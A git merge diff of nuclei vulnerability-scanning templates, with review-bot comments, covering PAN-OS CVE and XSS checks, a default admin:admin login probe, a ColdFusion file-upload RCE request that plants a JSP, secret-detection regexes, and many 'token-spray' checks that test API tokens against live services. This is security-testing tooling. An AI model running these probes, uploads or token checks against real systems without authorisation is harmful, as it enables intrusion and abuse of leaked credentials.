Merge branch 'projectdiscovery:master' into master
commit
f5b7612121
|
@ -8,11 +8,11 @@ info:
|
|||
- https://www.exploit-db.com/exploits/43342
|
||||
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
|
||||
severity: critical
|
||||
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2017-15944
|
||||
tags: cve,cve2017,rce,vpn,panos,globalprotect
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -24,9 +24,9 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "@start@Success@end@"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -2,16 +2,16 @@ id: CVE-2018-10141
|
|||
|
||||
info:
|
||||
name: GlobalProtect Login page XSS
|
||||
severity: medium
|
||||
author: dhiyaneshDk
|
||||
description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML.
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141
|
||||
tags: globalprotect,xss,cve,cve2018,vpn
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2018-10141
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2018,panos,vpn,globalprotect,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -21,14 +21,14 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'var valueUser = "j";-alert(1)-"x";'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,65 @@
|
|||
id: CVE-2018-15961
|
||||
|
||||
info:
|
||||
name: Adobe ColdFusion Unrestricted file upload RCE
|
||||
author: SkyLark-Lab,ImNightmaree
|
||||
severity: critical
|
||||
description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-15961
|
||||
- https://github.com/xbufu/CVE-2018-15961
|
||||
tags: cve,cve2018,adobe,rce,coldfusion,fileupload
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2018-15961
|
||||
cwe-id: CWE-434
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
|
||||
|
||||
-----------------------------24464570528145
|
||||
Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
<%@ page import="java.util.*,java.io.*"%>
|
||||
<%@ page import="java.security.MessageDigest"%>
|
||||
<%
|
||||
String cve = "CVE-2018-15961";
|
||||
MessageDigest alg = MessageDigest.getInstance("MD5");
|
||||
alg.reset();
|
||||
alg.update(cve.getBytes());
|
||||
byte[] digest = alg.digest();
|
||||
StringBuffer hashedpasswd = new StringBuffer();
|
||||
String hx;
|
||||
for (int i=0;i<digest.length;i++){
|
||||
hx = Integer.toHexString(0xFF & digest[i]);
|
||||
if(hx.length() == 1){hx = "0" + hx;}
|
||||
hashedpasswd.append(hx);
|
||||
}
|
||||
out.println(hashedpasswd.toString());
|
||||
%>
|
||||
-----------------------------24464570528145
|
||||
Content-Disposition: form-data; name="path"
|
||||
|
||||
{{randstr}}.jsp
|
||||
-----------------------------24464570528145--
|
||||
|
||||
- |
|
||||
GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
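Review bot: The first request writes `{{randstr}}.jsp` into the target's `uploadedFiles/` directory and nothing in the template removes it, so every positive result leaves a server-side script behind on the scanned host. The `tags:` line should flag this so operators can exclude the template from production scans, e.g. `tags: cve,cve2018,adobe,rce,coldfusion,fileupload,intrusive`. The `description` could also state that the check uploads a marker JSP that has to be deleted after verification. The MD5 word matcher has no `part:` key, while the other word matchers touched in this commit set `part: body` explicitly; adding it would keep the templates consistent.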
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: high
|
||||
description: Default Login of admin:admin on Palo Alto Networks PAN-OS application.
|
||||
reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
|
||||
tags: paloalto,panos,default-login
|
||||
tags: panos,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -17,19 +17,19 @@ requests:
|
|||
|
||||
user={{username}}&passwd={{password}}&challengePwd=&ok=Login
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
attack: pitchfork
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Set-Cookie: PHPSESSID"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: PaloAlto Networks GlobalProtect Panel
|
||||
author: organiccrap
|
||||
severity: info
|
||||
tags: panel
|
||||
tags: panel,panos
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -12,6 +12,7 @@ requests:
|
|||
- "{{BaseURL}}/global-protect/login.esp"
|
||||
- "{{BaseURL}}/sslmgr"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
id: credentials-disclosure
|
||||
id: credentials-disclosure-file
|
||||
|
||||
# Extract secrets regex like api keys, password, token, etc ... for different services
|
||||
# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue.
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
id: google-api-key
|
||||
id: google-api-key-file
|
||||
|
||||
info:
|
||||
name: Google API key
|
||||
|
@ -13,4 +13,4 @@ file:
|
|||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- "AIza[0-9A-Za-z\\-_]{35}"
|
||||
- "AIza[0-9A-Za-z\\-_]{35}"
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
id: sendgrid-api-key
|
||||
id: sendgrid-api-key-file
|
||||
|
||||
info:
|
||||
name: Sendgrid API Key
|
||||
|
@ -13,4 +13,4 @@ file:
|
|||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}"
|
||||
- "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}"
|
||||
|
|
|
@ -1,30 +0,0 @@
|
|||
id: phpmyadmin-setup
|
||||
|
||||
info:
|
||||
name: Publicly Accessible Phpmyadmin Setup
|
||||
author: sheikhrishad
|
||||
severity: medium
|
||||
tags: misc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/_phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/php/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/web/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "You want to configure phpMyAdmin using web interface"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,17 +1,33 @@
|
|||
id: phpmyadmin-setup
|
||||
|
||||
info:
|
||||
name: phpMyAdmin setup page
|
||||
author: thevillagehacker
|
||||
name: Publicly Accessible Phpmyadmin Setup
|
||||
author: sheikhrishad,thevillagehacker
|
||||
severity: medium
|
||||
tags: phpmyadmin
|
||||
reference: https://hackerone.com/reports/297339
|
||||
tags: phpmyadmin,misconfig
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/_phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/php/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/web/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/phpmyadmin/setup/index.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "You want to configure phpMyAdmin using web interface"
|
||||
- "<title>phpMyAdmin setup</title>"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -14,6 +14,7 @@ requests:
|
|||
- "{{BaseURL}}/phpmyadmin/index.php?db=information_schema"
|
||||
- "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
@ -21,6 +22,7 @@ requests:
|
|||
- "var db = 'information_schema';"
|
||||
- "var opendb_url = 'db_structure.php';"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -145,6 +145,11 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "__schema"
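Review bot: The added header matcher accepts only the literal `application/json`, so an endpoint that answers the introspection query with a different JSON media type (for example `application/graphql-response+json`) would no longer be reported even though `__schema` is in the body. Listing both values under `words:` with `condition: or` keeps the false-positive reduction without losing those servers. The `matchers-condition` for this request is outside the hunk, so this assumes the matchers are combined with `and`.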
|
||||
|
|
|
@ -19,5 +19,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "error"
|
||||
negative: true
|
||||
- '"username":'
|
||||
- '"id":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-apigee-edge
|
|||
info:
|
||||
name: Apigee Edge API Test
|
||||
author: dwisiswant0
|
||||
reference: https://apidocs.apigee.com/apis
|
||||
severity: info
|
||||
reference: https://apidocs.apigee.com/apis
|
||||
tags: token-spray,apigee
|
||||
|
||||
self-contained: true
|
||||
|
@ -24,5 +24,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "fault"
|
||||
negative: true
|
||||
- '"uuid":'
|
||||
- '"name":'
|
||||
condition: and
|
|
@ -20,5 +20,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Authorization required"
|
||||
negative: true
|
||||
- '"roleId":'
|
||||
- '"created":'
|
||||
condition: and
|
|
@ -16,7 +16,10 @@ requests:
|
|||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
negative: true
|
||||
status:
|
||||
- 401
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'data:'
|
||||
- 'email'
|
||||
- 'name'
|
||||
condition: and
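Review bot: The new word matcher uses unquoted substrings (`'data:'`, `'email'`, `'name'`) where most other templates in this commit match quoted JSON keys. If this API answers in JSON, `data:` never occurs in the body because the key is serialised as `"data":`, so a valid token would go unreported; `email` and `name` can also appear inside an error message. Suggest `- '"data":'`, `- '"email":'`, `- '"name":'`. The same loose matching appears in the hunks that add `'success'`/`'apikey'`/`'action'`, `'type'`/`'query'`/`'features'` and `'id'`/`'title'`/`'type'`. With the 401 status matcher gone, the word list is the only signal visible in this hunk.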
|
|
@ -19,7 +19,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Invalid API-key"
|
||||
- "key format invalid"
|
||||
condition: or
|
||||
negative: true
|
||||
- '"id":'
|
||||
- '"price":'
|
||||
- '"quoteQty":'
|
||||
condition: and
|
|
@ -16,6 +16,7 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'INVALID_ARG_ACCESS_TOKEN'
|
||||
- '"long_url":'
|
||||
- '"created_at":'
|
||||
condition: and
|
|
@ -16,7 +16,10 @@ requests:
|
|||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"id":'
|
||||
- '"graphql_id":'
|
||||
- '"email":'
|
||||
condition: and
|
|
@ -14,7 +14,10 @@ requests:
|
|||
- "https://api.buttercms.com/v2/posts/?auth_token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"meta":'
|
||||
- '"data":'
|
||||
- '"url":'
|
||||
condition: and
|
|
@ -16,6 +16,10 @@ requests:
|
|||
X-Token: "{{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"data":'
|
||||
- '"id":'
|
||||
- '"email":'
|
||||
condition: and
|
|
@ -14,6 +14,9 @@ requests:
|
|||
- "https://circleci.com/api/v1.1/me?circle-token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"admin"'
|
||||
- '"login"'
|
||||
condition: and
|
|
@ -16,6 +16,10 @@ requests:
|
|||
- "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"stat":'
|
||||
- '"formats":'
|
||||
- '"default_format":'
|
||||
condition: and
|
||||
|
|
|
@ -3,8 +3,8 @@ id: api-deviantart
|
|||
info:
|
||||
name: DeviantArt API Test
|
||||
author: zzeitlin
|
||||
reference: https://www.deviantart.com/developers/authentication
|
||||
severity: info
|
||||
reference: https://www.deviantart.com/developers/authentication
|
||||
tags: token-spray,deviantart
|
||||
|
||||
self-contained: true
|
||||
|
@ -18,5 +18,4 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"status":"error"'
|
||||
negative: true
|
||||
- '"status" : "success"'
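Review bot: The replacement matcher `'"status" : "success"'` is an exact substring with spaces around the colon, so the result depends on how the server happens to serialise its response; if the API ever emits compact JSON, a valid token is silently missed. A regex matcher tolerates both forms: `- type: regex` with `regex:` `- '"status"\s*:\s*"success"'`. The `'{"valid": true}'` word in the api-sonarcloud hunk has the same whitespace sensitivity and could be written as `'"valid"\s*:\s*true'`.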
|
|
@ -16,6 +16,9 @@ requests:
|
|||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"account_id":'
|
||||
- '"email":'
|
||||
condition: and
|
|
@ -16,6 +16,10 @@ requests:
|
|||
- "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'success'
|
||||
- 'apikey'
|
||||
- 'action'
|
||||
condition: and
|
|
@ -24,5 +24,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "No active API token"
|
||||
negative: true
|
||||
- '"access_token":'
|
||||
- '"scopes":'
|
||||
condition: and
|
|
@ -19,4 +19,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'login'
|
||||
- '"login":'
|
||||
- '"avatar_url":'
|
||||
condition: and
|
|
@ -17,10 +17,9 @@ requests:
|
|||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
condition: or
|
||||
status:
|
||||
- 200
|
||||
- 201
|
||||
- 202
|
||||
- 206
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"created_at":'
|
||||
- '"git_url":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-hubspot
|
|||
info:
|
||||
name: HubSpot API Test
|
||||
author: zzeitlin
|
||||
reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners
|
||||
severity: info
|
||||
reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners
|
||||
tags: token-spray,hubspot
|
||||
|
||||
self-contained: true
|
||||
|
@ -12,11 +12,20 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}"
|
||||
- "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}"
|
||||
- "https://api.hubapi.com/contacts/v1/lists/static?count=3&hapikey={{token}}"
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'error'
|
||||
negative: true
|
||||
- '"portalId":'
|
||||
- '"ownerId":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"metaData":'
|
||||
- '"portalId":'
|
||||
condition: and
|
|
@ -11,9 +11,13 @@ self-contained: true
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}"
|
||||
- "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"data":'
|
||||
- '"access_token":'
|
||||
- '"name":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-ipstack
|
|||
info:
|
||||
name: IPStack API Test
|
||||
author: zzeitlin
|
||||
reference: https://ipstack.com/documentation
|
||||
severity: info
|
||||
reference: https://ipstack.com/documentation
|
||||
tags: token-spray,ipstack
|
||||
|
||||
self-contained: true
|
||||
|
@ -16,6 +16,8 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'invalid_access_key'
|
||||
- '"ip":'
|
||||
- '"hostname":'
|
||||
- '"type":'
|
||||
condition: and
|
|
@ -3,22 +3,22 @@ id: api-iterable
|
|||
info:
|
||||
name: Iterable API Test
|
||||
author: zzeitlin
|
||||
reference: https://api.iterable.com/api/docs
|
||||
severity: info
|
||||
reference: https://api.iterable.com/api/docs
|
||||
tags: token-spray,iterable
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty"
|
||||
- "https://api.iterable.com/api/catalogs"
|
||||
headers:
|
||||
Api_Key: "{{token}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'BadApiKey'
|
||||
- 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve
|
||||
- '"name":'
|
||||
- '"catalogNames":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-jumpcloud
|
|||
info:
|
||||
name: JumpCloud API Test
|
||||
author: zzeitlin
|
||||
reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key
|
||||
severity: info
|
||||
reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key
|
||||
tags: token-spray,jumpcloud
|
||||
|
||||
self-contained: true
|
||||
|
@ -18,6 +18,7 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'Unauthorized'
|
||||
- '"_id":'
|
||||
- '"agentServer":'
|
||||
condition: and
|
|
@ -21,5 +21,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Credentials are required"
|
||||
negative: true
|
||||
- '"input":'
|
||||
- '"connectorType":'
|
||||
condition: and
|
|
@ -21,6 +21,8 @@ requests:
|
|||
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- "serviceErrorCode"
|
||||
- '"id":'
|
||||
- '"firstName":'
|
||||
- '"localized":'
|
||||
condition: and
|
|
@ -3,19 +3,23 @@ id: api-lokalise
|
|||
info:
|
||||
name: Lokalise API Test
|
||||
author: zzeitlin
|
||||
reference: https://app.lokalise.com/api2docs/curl/#resource-projects
|
||||
severity: info
|
||||
reference: https://app.lokalise.com/api2docs/curl/#resource-projects
|
||||
tags: token-spray,lokalise
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.lokalise.com/api2/projects/"
|
||||
- "https://api.lokalise.com/api2/teams"
|
||||
headers:
|
||||
X-Api-Token: "{{token}}"
|
||||
x-api-Token: "{{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"teams":'
|
||||
- '"team_id":'
|
||||
- '"name":'
|
||||
condition: and
|
|
@ -3,15 +3,15 @@ id: api-loqate
|
|||
info:
|
||||
name: Loqate API Test
|
||||
author: zzeitlin
|
||||
reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/
|
||||
severity: info
|
||||
reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/
|
||||
tags: token-spray,loqate
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR"
|
||||
- "https://api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR"
|
||||
|
||||
matchers:
|
||||
- type: word
|
|
@ -3,8 +3,8 @@ id: api-mailchimp
|
|||
info:
|
||||
name: Mailchimp API Test
|
||||
author: zzeitlin
|
||||
reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration
|
||||
severity: info
|
||||
reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration
|
||||
tags: token-spray,mailchimp
|
||||
|
||||
self-contained: true
|
|
@ -3,8 +3,8 @@ id: api-mailgun
|
|||
info:
|
||||
name: Mailgun API Test
|
||||
author: zzeitlin
|
||||
reference: https://documentation.mailgun.com/en/latest/api-intro.html
|
||||
severity: info
|
||||
reference: https://documentation.mailgun.com/en/latest/api-intro.html
|
||||
tags: token-spray,mailgun
|
||||
|
||||
self-contained: true
|
||||
|
@ -16,6 +16,10 @@ requests:
|
|||
Authorization: Basic {{base64('api:' + token)}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"total_count":'
|
||||
- '"items":'
|
||||
- '"created_at":'
|
||||
condition: and
|
|
@ -14,7 +14,10 @@ requests:
|
|||
- "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'type'
|
||||
- 'query'
|
||||
- 'features'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-nerdgraph
|
|||
info:
|
||||
name: New Relic NerdGraph API Test
|
||||
author: zzeitlin
|
||||
reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/
|
||||
severity: info
|
||||
reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/
|
||||
tags: token-spray,newrelic,nerdgraph
|
||||
|
||||
self-contained: true
|
|
@ -3,8 +3,8 @@ id: api-netlify
|
|||
info:
|
||||
name: Netlify API Test
|
||||
author: dwisiswant0
|
||||
reference: https://docs.netlify.com/api/get-started/
|
||||
severity: info
|
||||
reference: https://docs.netlify.com/api/get-started/
|
||||
tags: token-spray,netlify
|
||||
|
||||
self-contained: true
|
||||
|
@ -16,6 +16,10 @@ requests:
|
|||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"id":'
|
||||
- '"premium":'
|
||||
- '"claimed":'
|
||||
condition: and
|
|
@ -3,9 +3,9 @@ id: api-npm
|
|||
info:
|
||||
name: NPM API Test
|
||||
author: zzeitlin
|
||||
reference: https://docs.npmjs.com/creating-and-viewing-access-tokens
|
||||
severity: info
|
||||
tags: token-spray,node,npm,package,manager
|
||||
reference: https://docs.npmjs.com/creating-and-viewing-access-tokens
|
||||
tags: token-spray,node,npm
|
||||
|
||||
self-contained: true
|
||||
requests:
|
|
@ -3,21 +3,25 @@ id: api-onelogin
|
|||
info:
|
||||
name: OneLogin API Test
|
||||
author: dwisiswant0
|
||||
reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview
|
||||
severity: info
|
||||
reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview
|
||||
tags: token-spray,onelogin
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.us.onelogin.com/api/2/users?fields=id"
|
||||
- "https://api.eu.onelogin.com/api/2/users?fields=id"
|
||||
- "https://api.us.onelogin.com/api/2/apps"
|
||||
- "https://api.eu.onelogin.com/api/2/apps"
|
||||
headers:
|
||||
Authorization: Bearer {{token}}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"id":'
|
||||
- '"connector_id":'
|
||||
- '"auth_method":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-openweather
|
|||
info:
|
||||
name: OpenWeather API Test
|
||||
author: zzeitlin
|
||||
reference: https://openweathermap.org/current
|
||||
severity: info
|
||||
reference: https://openweathermap.org/current
|
||||
tags: token-spray,weather,openweather
|
||||
|
||||
self-contained: true
|
||||
|
@ -14,6 +14,10 @@ requests:
|
|||
- "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"coord":'
|
||||
- '"weather":'
|
||||
- '"base":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-optimizely
|
|||
info:
|
||||
name: Optimizely API Test
|
||||
author: dwisiswant0
|
||||
reference: https://library.optimizely.com/docs/api/app/v2/index.html
|
||||
severity: info
|
||||
reference: https://library.optimizely.com/docs/api/app/v2/index.html
|
||||
tags: token-spray,optimizely
|
||||
|
||||
self-contained: true
|
||||
|
@ -24,4 +24,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "account_id"
|
||||
- '"account_id":'
|
||||
- '"confidence_threshold":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-pagerduty
|
|||
info:
|
||||
name: Pagerduty API Test
|
||||
author: zzeitlin
|
||||
reference: https://developer.pagerduty.com/api-reference
|
||||
severity: info
|
||||
reference: https://developer.pagerduty.com/api-reference
|
||||
tags: token-spray,pagerduty
|
||||
|
||||
self-contained: true
|
||||
|
@ -17,7 +17,9 @@ requests:
|
|||
Authorization: Token token={{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"schedules":'
|
||||
- '"id":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-pendo
|
|||
info:
|
||||
name: Pendo API Test
|
||||
